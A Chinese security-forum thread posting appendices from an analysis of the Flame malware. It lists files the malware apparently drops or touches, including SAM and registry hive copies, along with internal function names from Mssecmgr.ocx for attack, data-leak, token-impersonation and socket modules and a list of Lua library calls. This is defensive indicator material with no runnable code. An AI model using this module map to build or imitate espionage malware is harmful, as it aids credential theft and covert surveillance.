"C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winrt32.dll"                                 "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winrt32.ocx"                                 "C:\WINDOWS\system32\winconf32.ocx"                                              "C:\WINDOWS\system32\mssui.drv"                                                  "C:\WINDOWS\system32\indsvc32.dll"                                               "C:\WINDOWS\system32\indsvc32.ocx"                                               "C:\WINDOWS\system32\modevga.com"                                                 "C:\WINDOWS\system32\commgr32.dll"                                               "C:\WINDOWS\system32\watchxb.sys"                                                 "C:\WINDOWS\system32\scaud32.exe"                                                 "C:\WINDOWS\system32\sdclt32.exe"    "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\scsec32.exe"                                 "C:\Program  Files\Common Files\Microsoft Shared\MSAudio\mpgaud.dat"              "C:\Program  Files\Common Files\Microsoft Shared\MSAudio\m4aaux.dat"              "C:\Program  Files\Common Files\Microsoft Shared\MSAudio\wpgfilter.dat"           "C:\Program  Files\Common Files\Microsoft Shared\MSAudio\audcache"                "C:\Program  Files\Common Files\Microsoft Shared\MSAudio\audfilter.dat"           "C:\Program  Files\Common Files\Microsoft Shared\MSAudio\m3aaux.dat"              "C:\Program  Files\Common Files\Microsoft Shared\MSAudio\m3afilter.dat"           "C:\Program  Files\Common Files\Microsoft Shared\MSAudio\m3asound.dat"            "C:\Program  Files\Common Files\Microsoft Shared\MSAudio\m4afilter.dat"           "C:\Program  Files\Common Files\Microsoft Shared\MSAudio\m4asound.dat"            "C:\Program  Files\Common Files\Microsoft Shared\MSAudio\m5aaux.dat"              "C:\Program  Files\Common Files\Microsoft Shared\MSAudio\m5afilter.dat"           "C:\Program  Files\Common Files\Microsoft Shared\MSAudio\m5asound.dat"            "C:\Program  Files\Common Files\Microsoft Shared\MSAudio\mpgaaux.dat"             "C:\Program  Files\Common Files\Microsoft Shared\MSAudio\qpgaaux.dat"             "C:\Program  Files\Common Files\Microsoft Shared\MSAudio\mlcache.dat"             "C:\Program  Files\Common Files\Microsoft Shared\MSAudio\srcache.dat"             "C:\WINDOWS\Ef_trace.log"                                                 "C:\WINDOWS\repair\system"                                                 "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~rei525.tmp"                          "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~rei524.tmp"                       "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\GRb9M2.bat"                        "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~a28.tmp"                            "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~dra51.tmp"                        "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~TFL849.tmp"                      "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~TFL848.tmp"                      "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~DFL546.tmp"                         "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~DFL544.tmp"                    "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~DFL544.tmp"                   "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~DFL543.tmp"                  "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~DFL543.tmp"                      "C:\WINDOWS\repair\sam"                                                      "C:\WINDOWS\repair\security"                                                      "C:\WINDOWS\repair\default"                                                       "C:\WINDOWS\repair\software"                                                     "C:\WINDOWS\Prefetch\Layout.ini"                                                  "C:\WINDOWS\Prefetch\NTOSBOOT-B00DFAAD.pf"                                   "C:\WINDOWS\system32\config\sam.sav"                                             "C:\WINDOWS\system32\config\security.sav"                                        "C:\WINDOWS\system32\config\default.sav"                                         "C:\WINDOWS\system32\config\software.sav"                                        "C:\WINDOWS\system32\config\system.sav"                                          "C:\WINDOWS\system32\config\userdiff.sav"                                        "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\sstab.dat"                                   "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\sstab.dat"                                   "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~dra52.tmp"                                  "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~ZFF042.tmp"                                 "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\sstab15.dat"                                 "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\wpab32.bat"                                  "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\wpab32.bat  "                                 "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~DF05AC8.tmp"                                "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~DFD85D3.tmp"                                "C:\WINDOWS\system32\pcldrvx.ocx"                                                 "C:\Program  Files\Common Files\Microsoft Shared\MSAudio\dstrlog.dat"             "C:\Program  Files\Common Files\Microsoft Shared\MSAudio\dstrlogh.dat"            "C:\Program  Files\Common Files\Microsoft Shared\MSAuthCtrl\authcfg.dat"          "C:\Program  Files\Common Files\Microsoft Shared\MSAuthCtrl\ctrllist.dat"         "C:\Program  Files\Common Files\Microsoft Shared\MSAuthCtrl\lmcache.dat"          "C:\Program  Files\Common Files\Microsoft Shared\MSAuthCtrl\ntcache.dat"          "C:\Program  Files\Common Files\Microsoft Shared\MSAuthCtrl\posttab.bin"          "C:\Program  Files\Common Files\Microsoft Shared\MSAuthCtrl\secindex.dat"         "C:\Program  Files\Common Files\Microsoft Shared\MSAuthCtrl\tokencpt"             "C:\Program  Files\Common Files\Microsoft Shared\MSSecurityMgr\dstrlog.dat"       "C:\Program  Files\Common Files\Microsoft Shared\MSSecurityMgr\dstrlogh.dat"      "C:\Program  Files\Common Files\Microsoft Shared\MSSecurityMgr\rccache.dat"       "C:\Program  Files\Common Files\Microsoft Shared\MSSecurityMgr\rccache.dat"       "C:\Program  Files\Common Files\Microsoft Shared\MSSndMix\audtable.dat"           "C:\Program  Files\Common Files\Microsoft Shared\MSSndMix\fmpidx.bin"             "C:\Program  Files\Common Files\Microsoft Shared\MSSndMix\lrlogic"                "C:\Program  Files\Common Files\Microsoft Shared\MSSndMix\mixercfg.dat"           "C:\Program  Files\Common Files\Microsoft Shared\MSSndMix\sndmix.drv"             "C:\Program  Files\Common Files\Microsoft Shared\MSSndMix\lmcache.dat"            "C:\Program  Files\Common Files\Microsoft Shared\MSSndMix\ntcache.dat"            "C:\Program  Files\Common Files\Microsoft Shared\MSSndMix\mixerdef.dat"           "C:\WINDOWS\system32\msglu32.ocx"                                                 "C:\WINDOWS\Temp\~8C5FF6C.tmp"                                                    "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~dra53.tmp"                                  "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~HLV084.tmp"                                 "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~HLV294.tmp"                                 "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~HLV473.tmp"                                 "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~HLV751.tmp"                                 "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~HLV751.tmp"                                 "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~KWI988.tmp"                                 "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~KWI989.tmp"                                 "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~rf288.tmp"                                  "C:\WINDOWS\system32\advnetcfg.ocx"                                              "C:\WINDOWS\system32\advpck.dat"                                                  "C:\WINDOWS\system32\authpack.ocx"                                               "C:\WINDOWS\system32\boot32drv.sys"                                              "C:\WINDOWS\system32\ccalc32.sys"                                                 "C:\WINDOWS\system32\comspol32.dll"                                              "C:\WINDOWS\system32\ctrllist.dat"                                               "C:\WINDOWS\system32\mssvc32.ocx"                                                 "C:\WINDOWS\system32\ntaps.dat"                                                  "C:\WINDOWS\system32\nteps32.ocx"                                                 "C:\WINDOWS\system32\rpcnc.dat"                                                   "C:\WINDOWS\system32\soapr32.ocx"                                                 "C:\WINDOWS\system32\sstab.dat"                                                   "C:\WINDOWS\system32\sstab0.dat"                                                  "C:\WINDOWS\system32\sstab1.dat"                                                  "C:\WINDOWS\system32\sstab10.dat"                                                 "C:\WINDOWS\system32\sstab2.dat"                                                  "C:\WINDOWS\system32\sstab3.dat"                                                  "C:\WINDOWS\system32\sstab4.dat"                                                  "C:\WINDOWS\system32\sstab5.dat"                                                  "C:\WINDOWS\system32\sstab6.dat"                                                  "C:\WINDOWS\system32\sstab7.dat"                                                  "C:\WINDOWS\system32\sstab8.dat"                                                  "C:\WINDOWS\system32\sstab9.dat"                                                  "C:\WINDOWS\system32\msglu32.ocx"                                              "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~dra53.tmp"                                 "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~rf288.tmp"                                  "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~dra61.tmp"                                 "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~a38.tmp"                                    "C:\WINDOWS\system32\soapr32.ocx"                                                 "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp~mso2a2.tmp"                                  "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp~mso2a0.tmp"                                  "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp~mso2a1.tmp"                                  "C:\WINDOWS\system32\nteps32.ocx"                                                 "C:\WINDOWS\system32\advnetcfg.ocx"                                              "C:\WINDOWS\system32\boot32drv.sys"                                              "C:\WINDOWS\system32\ccalc32.sys"                                                 "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~HLV473.tmp"                                 "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~HLV927.tmp"                                 "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~HLV084.tmp"                                 "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~HLV294.tmp"                                 "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~HLV751.tmp"                                 "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~KWI988.tmp"                                 "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~KWI989.tmp"         

 楼主| 发表于 2012-8-2 09:51 | 显示全部楼层
本帖最后由 wobaxindiule 于 2012-8-2 16:15 编辑

附录六

5-6Mssecmgr.ocx文件中的LUA脚本调用函数列表内容


"<|oOo|>flame::lua:: LuaState::interfaceBootStrapper<|oOo|>316<|oOo|>"  
"  <|oOo|>flame::lua::SockPackage:: LuaSockServices::send<|oOo|>1731<|oOo|>"
"<|oOo|>flame::clan::AttackPackage::audition<|oOo|>218<|oOo|>"
"<|oOo|>flame::lua::ConfigurationPackage::removeListElement<|oOo|>615<|oOo|>"
"<|oOo|>flame::lua:: LuaState::interfaceBootStrapper<|oOo|>320<|oOo|>"
"<|oOo|>flame::lua::CommandPackage::post<|oOo|>177<|oOo|>"
  "<|oOo|>flame::clan::AttackPackage::audition<|oOo|>234<|oOo|>"
"<|oOo|>flame::lua::SockPackage:: LuaSockServices::connect<|oOo|>1894<|oOo|>"  <|oOo|>flame::lua::ConfigurationPackage::getListSize<|oOo|>454<|oOo|>"  
"<|oOo|>flame::lua::FlameOSPackage::exec<|oOo|>1161<|oOo|>"  
"<|oOo|>flame::lua::CommandPackage::runCmdSync<|oOo|>213<|oOo|>"
"<|oOo|>flame::lua:: LuaState::argAsBoolean<|oOo|>188<|oOo|>"
  "<|oOo|>flame::lua::CommandPackage::runCmdSync<|oOo|>203<|oOo|>"
  "<|oOo|>flame::clan::AttackPackage::audition<|oOo|>233<|oOo|>"
"<|oOo|>flame::dbquery:: DbQueryPackage::parseSingleQuery<|oOo|>210<|oOo|>"  
"<|oOo|>flame::lua:: LuaState::interfaceBootStrapper<|oOo|>326<|oOo|>"
  "<|oOo|>flame::lua:: LuaState::interfaceBootStrapper<|oOo|>337<|oOo|>"
"<|oOo|>flame::lua::ConfigurationPackage::hasKey<|oOo|>270<|oOo|>"  
"<|oOo|>flame::lua:: LuaState::interfaceBootStrapper<|oOo|>340<|oOo|>"
  "<|oOo|>flame::lua::SockPackage:: LuaSockServices::recv<|oOo|>1756<|oOo|>"
"<|oOo|>flame::lua::ConfigurationPackage::get<|oOo|>331<|oOo|>"  
"<|oOo|>flame::clan::AttackPackage::audition<|oOo|>229<|oOo|>"
"<|oOo|>flame::lua:: LuaState::interfaceBootStrapper<|oOo|>350<|oOo|>"
"<|oOo|>flame::lua::ZlibPackage::compress<|oOo|>2158<|oOo|>"
  "<|oOo|>flame::lua:: LuaState::interfaceBootStrapper<|oOo|>334<|oOo|>"
"<|oOo|>flame::clan:: DbPackage::pushSQLiteValue<|oOo|>430<|oOo|>"
"<|oOo|>flame::lua::FlameOSPackage:: DHCPAddress<|oOo|>1238<|oOo|>"
"<|oOo|>flame::lua::ConfigurationPackage::getListElement<|oOo|>584<|oOo|>"
"<|oOo|>flame::lua:: LuaState::interfaceBootStrapper<|oOo|>352<|oOo|>"  
"<|oOo|>flame::clan::AttackPackage::audition<|oOo|>231<|oOo|>"
"<|oOo|>flame::dbquery:: DbQueryPackage::executeQueries<|oOo|>192<|oOo|>"
"<|oOo|>flame::lua::SockPackage:: LuaSockServices::connect<|oOo|>1868<|oOo|>"
"<|oOo|>flame::lua::CommandPackage::runCmdSync<|oOo|>199<|oOo|>"
  "<|oOo|>flame::lua::FlameOSPackage::hostname<|oOo|>1069<|oOo|>"
"<|oOo|>flame::cruise::CruisePackage::getDomainGroupUsers<|oOo|>154<|oOo|>"  
"<|oOo|>flame::lua::FileIOPackage::fileSize<|oOo|>900<|oOo|>"  
"<|oOo|>flame::clan::AttackPackage::pathetic3<|oOo|>153<|oOo|>"
"<|oOo|>flame::lua:: LogPackage::writeLog<|oOo|>1476<|oOo|>"
  "<|oOo|>flame::clan::AttackPackage::pathetic3<|oOo|>156<|oOo|>"  
"<|oOo|>flame::clan::AttackPackage::audition<|oOo|>238<|oOo|>"  
"<|oOo|>flame::lua::FlameOSPackage::getMac<|oOo|>1301<|oOo|>"
"<|oOo|>flame::dbquery:: DbQueryPackage::executeQueries<|oOo|>198<|oOo|>"
"<|oOo|>flame::lua::FlameOSPackage::getIpByHostName<|oOo|>1267<|oOo|>"  
"<|oOo|>flame::clan::AttackPackage::pathetic3<|oOo|>154<|oOo|>"  
"<|oOo|>flame::lua::SockPackage:: LuaSockServices::bind<|oOo|>1840<|oOo|>"
"<|oOo|>flame::lua:: LuaState::argAsString<|oOo|>175<|oOo|>"
"<|oOo|>flame::clan::AttackPackage::audition<|oOo|>227<|oOo|>"
  "<|oOo|>flame::clan::AttackPackage::pathetic3<|oOo|>158<|oOo|>"
"<|oOo|>flame::lua::ConfigurationPackage::setListElement<|oOo|>526<|oOo|>"
  "<|oOo|>flame::lua::ConfigurationPackage::remove<|oOo|>394<|oOo|>"  
"<|oOo|>flame::clan::AttackPackage::audition<|oOo|>224<|oOo|>"
"<|oOo|>flame::lua::SockPackage:: LuaSockServices::connect<|oOo|>1909<|oOo|>"  
"<|oOo|>flame::lua:: LuaState::interfaceBootStrapper<|oOo|>356<|oOo|>"
  "<|oOo|>flame::lua::ConfigurationPackage::getSubKeys<|oOo|>428<|oOo|>"
"<|oOo|>flame::lua:: LuaState::luaHook<|oOo|>221<|oOo|>"  
"<|oOo|>flame::clan::AttackPackage::pathetic3<|oOo|>163<|oOo|>"
"<|oOo|>flame::lua::ConfigurationPackage::pushLuaObjectFromKeyValue<|oOo|>669<|oOo|>"  
"<|oOo|>flame::clan::AttackPackage::audition<|oOo|>222<|oOo|>"
  "<|oOo|>flame::lua:: LuaState::interfaceBootStrapper<|oOo|>346<|oOo|>"
"<|oOo|>flame::lua:: LuaState::luaHook<|oOo|>226<|oOo|>"  
"<|oOo|>flame::lua::FileIOPackage::del<|oOo|>802<|oOo|>"
"<|oOo|>flame::lua:: LeakPackage::reportLeakCompletion<|oOo|>2125<|oOo|>"
"<|oOo|>flame::lua:: LuaState::interfaceBootStrapper<|oOo|>328<|oOo|>"
  "<|oOo|>flame::lua:: LuaState::interfaceBootStrapper<|oOo|>322<|oOo|>"
"<|oOo|>flame::clan::AttackPackage::audition<|oOo|>236<|oOo|>"
"<|oOo|>flame::lua::SockPackage:: LuaSockServices::recv<|oOo|>1818<|oOo|>"
  "<|oOo|>flame::cruise::CruisePackage::getUserLocalGroups<|oOo|>252<|oOo|>"
"<|oOo|>flame::lua:: LuaState::interfaceBootStrapper<|oOo|>332<|oOo|>"  
"<|oOo|>flame::clan::AttackPackage::pathetic3<|oOo|>150<|oOo|>"
  "<|oOo|>flame::lua::ConfigurationPackage::set<|oOo|>367<|oOo|>"
"<|oOo|>flame::clan::AttackPackage::audition<|oOo|>235<|oOo|>"  
"<|oOo|>flame::lua::SockPackage:: LuaSockServices::recv<|oOo|>1792<|oOo|>"
"<|oOo|>flame::lua::FlameOSPackage::defaultGateway<|oOo|>1212<|oOo|>"
"<|oOo|>flame::lua:: LuaState::argAsBuffer<|oOo|>166<|oOo|>"  
"<|oOo|>flame::clan::AttackPackage::audition<|oOo|>219<|oOo|>"  
"<|oOo|>flame::impersonator::ImpersonatePackage::getTokenByUser<|oOo|>198<|oOo|>"  
"<|oOo|>flame::lua::StoragePackage::getStorageMap<|oOo|>2000<|oOo|>"
"<|oOo|>flame::lua::SockPackage:: LuaSockServices::send<|oOo|>1686<|oOo|>"
"<|oOo|>flame::lua:: LeakPackage::getLeak<|oOo|>2049<|oOo|>"
"<|oOo|>flame::lua::FileIOPackage::copy<|oOo|>846<|oOo|>"  "<|oOo|>flame::lua::ZlibPackage::uncompress<|oOo|>2179<|oOo|>"
  "<|oOo|>flame::lua::StoragePackage::getStorageMap<|oOo|>1997<|oOo|>"
  "<|oOo|>flame::dbquery:: DbQueryPackage::executeQueries<|oOo|>143<|oOo|>"
"<|oOo|>flame::lua:: LuaState::interfaceBootStrapper<|oOo|>330<|oOo|>"
"<|oOo|>flame::cruise::CruisePackage::getLocalGroupMembers<|oOo|>108<|oOo|>"
"<|oOo|>flame::clan::AttackPackage::audition<|oOo|>220<|oOo|>"
"<|oOo|>flame::lua::FlameOSPackage::defaultGateway<|oOo|>1215<|oOo|>"  
"<|oOo|>flame::clan::AttackPackage::audition<|oOo|>225<|oOo|>"
  "<|oOo|>flame::impersonator::ImpersonatePackage::getCurrentToken<|oOo|>173<|oOo|>"
"<|oOo|>flame::lua:: LeakPackage::getLeak<|oOo|>2062<|oOo|>"
"<|oOo|>flame::lua:: LuaState::interfaceBootStrapper<|oOo|>343<|oOo|>"
  "<|oOo|>flame::lua::FlameOSPackage:: D HCPAddress<|oOo|>1235<|oOo|>"
"<|oOo|>flame::clan::AttackPackage::pathetic3<|oOo|>161<|oOo|>"
  "<|oOo|>flame::lua::FileIOPackage::truncate<|oOo|>821<|oOo|>"
"<|oOo|>flame::lua::FileIOPackage::move<|oOo|>876<|oOo|>"  
"<|oOo|>flame::cruise::CruisePackage::getLocalGroups<|oOo|>82<|oOo|>"
  "<|oOo|>flame::lua::StoragePackage::save<|oOo|>1981<|oOo|>"  
"<|oOo|>flame::lua::ConfigurationPackage::getType<|oOo|>300<|oOo|>"
"<|oOo|>flame::clan::AttackPackage::audition<|oOo|>217<|oOo|>"
"<|oOo|>flame::clan::WmiPackage::getNextResult<|oOo|>465<|oOo|>"  
"<|oOo|>flame::lua:: LuaState::interfaceBootStrapper<|oOo|>318<|oOo|>"
"<|oOo|>flame::impersonator::ImpersonatePackage::getCurrentToken<|oOo|>168<|oOo|>"
"<|oOo|>flame::lua:: LuaState::argAsStringsMap<|oOo|>153<|oOo|>"
"<|oOo|>flame::clan::AttackPackage::pathetic3<|oOo|>151<|oOo|>"
"<|oOo|>flame::lua::ConfigurationPackage::setFromStack<|oOo|>709<|oOo|>"  
"<|oOo|>flame::clan::AttackPackage::pathetic3<|oOo|>152<|oOo|>"
"<|oOo|>flame::lua::FlameOSPackage::domainName<|oOo|>1193<|oOo|>"  

 楼主| 发表于 2012-8-2 10:13 | 显示全部楼层
本帖最后由 wobaxindiule 于 2012-8-2 16:16 编辑

附录七

5-7Mssecmgr.ocx文件中使用LUA脚本函数列表内容



luaB_cocreate  luaB_collectgarbage  luaB_coresume  luaB_cowrap  luaB_error  luaB_gcinfo  luaB_getfenv  luaB_getmetatable  luaB_ipairs  luaB_load  luaB_loadstring  luaB_newproxy  luaB_next  luaB_pairs  luaB_pcall  luaB_rawequal  luaB_rawget  luaB_rawset  luaB_select  luaB_setfenv  luaB_setmetatable  luaB_tonumber  luaB_tostring  luaB_type  luaB_unpack  luaB_xpcall  luaD_call  luaD_reallocCI  luaD_throw  

  
luaG_runerror  luaG_typeerror  luaI_openlib  luaL_addlstring  luaL_addvalue  luaL_argerror  luaL_checkany  luaL_checkinteger  luaL_checklstring  luaL_checknumber  luaL_checkoption  luaL_checktype  luaL_checkudata  luaL_error  luaL_findtable  luaL_getmetafield  luaL_newmetatable  luaL_optlstring  luaL_prepbuffer  luaL_pushresult  luaL_typerror  luaL_where  luaS_newlstr  luaT_gettmbyobj  luaV_settable  lua_addk  lua_adjuststack  lua_assignment  lua_aux_close  


lua_auxopen  lua_auxresume  lua_base_open  lua_body  lua_breakstat  lua_concat  lua_createmeta  lua_createstdfile  lua_createtable  lua_db_errorfb  lua_db_getinfo  lua_emptybuffer  lua_enterlevel  lua_errorlimit  lua_f_flush  lua_f_read  lua_f_seek  lua_f_setvbuf  lua_f_write  lua_fflush  lua_fixjump  lua_forlist  lua_fornum  lua_funcargs  lua_funcinfo  lua_g_read  lua_g_write  lua_getcurrenv  lua_getfenv  
  

lua_getfield  lua_getfunc  lua_getinfo  lua_getobjname  lua_getstack  lua_getthread  lua_index2adr  lua_indexupvalue  lua_insert  lua_io_close  lua_io_fclose  lua_io_gc  lua_io_open  lua_io_pclose  lua_io_readline  lua_io_tostring  lua_io_type  lua_ipairsaux  lua_isnumber  lua_load_aux  lua_luaK_checkstack  lua_luaK_code  lua_luaopen_base  lua_luaopen_debug  lua_luaopen_io  lua_luaopen_math  lua_luaopen_os  lua_luaopen_string  lua_luaopen_table  

lua_new_localvar  lua_newfile  lua_newuserdata  lua_panic  lua_parlist  lua_prefixexp  lua_pushcclosure  lua_pushclosure  lua_pushfstring  lua_pushlstring  lua_pushresult  lua_pushvalue  lua_recfield  lua_registerlocalvar  lua_remove  lua_setfield  lua_setmetatable  lua_settabsi  lua_settabss  lua_settop  lua_simpleexp  lua_tag_error  lua_tofile  lua_tointeger  lua_tonumber  lua_treatstackoption  lua_type  lua_typename  lua_yield  

 楼主| 发表于 2012-8-2 10:15 | 显示全部楼层
您需要登录后才可以回帖 登录 | 注册创意安天

本版积分规则

小黑屋|手机版|Archiver|创意安天 ( 京ICP备09068574,ICP证100468号。 )

GMT+8, 2022-7-2 22:07

Powered by Discuz! X3.4

Copyright © 2001-2021, Tencent Cloud.

快速回复 返回顶部 返回列表